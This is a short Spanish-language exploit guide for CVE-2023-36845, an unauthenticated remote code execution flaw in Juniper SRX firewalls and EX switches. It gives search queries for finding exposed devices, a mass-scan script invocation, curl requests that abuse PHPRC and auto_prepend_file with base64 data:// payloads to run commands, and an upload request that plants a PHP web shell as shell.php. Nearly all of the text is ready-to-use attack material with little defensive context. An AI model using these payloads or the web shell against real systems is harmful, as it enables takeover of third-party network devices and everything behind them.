
Juniper Firewalls CVE-2023-36845 - RCE
CVE-2023-36845 representa una notable vulnerabilidad de manipulación de variables de entorno PHP que afecta a los firewalls Juniper SRX y switches EX. Si bien Juniper ha clasificado esta vulnerabilidad como de gravedad media, en este artículo explicaremos cómo esta única vulnerabilidad puede ser aprovechada para la ejecución remota de código sin autenticación.
title:"Juniper Web Device Manager"
title:"Juniper" http.favicon.hash:2141724739
Detección
python3 CVE-2023-36845.py -f targets.txt -o output.txt
Es factible utilizar cualquier envoltorio de protocolo junto con auto_prepend_file. La opción más adecuada para esta operación es el protocolo data://, que permite proporcionar en línea el "archivo secundario". Aquí hay una representación sofisticada de este exploit, ejecutando el <? phpinfo(); ?> incrustado dentro del esquema data://:
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'
Ejecutar el comando whoami
<?php shell_exec('whoami'); ?>
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD9waHAgc2hlbGxfZXhlYygnd2hvYW1pJyk7ID8+Cg=="'
Subir un archivo
<?php if(isset($_REQUEST[cmd])){ echo "<pre>"; $cmd = ($_REQUEST[cmd]); system($cmd); echo "</pre>"; die; }?>
$ curl http://target.tld/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "shell.php", "fileData": ",PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUW2NtZF0pKXsgZWNobyAiPHByZT4iOyAkY21kID0gKCRfUkVRVUVTVFtjbWRdKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pgo=
", "csize": 110}]'
| Parámetro | Descripción | Tipo |
|---|---|---|
| --file / -f | Archivo de objetivos de entrada | Archivo |
| -o | Archivo de salida | Archivo |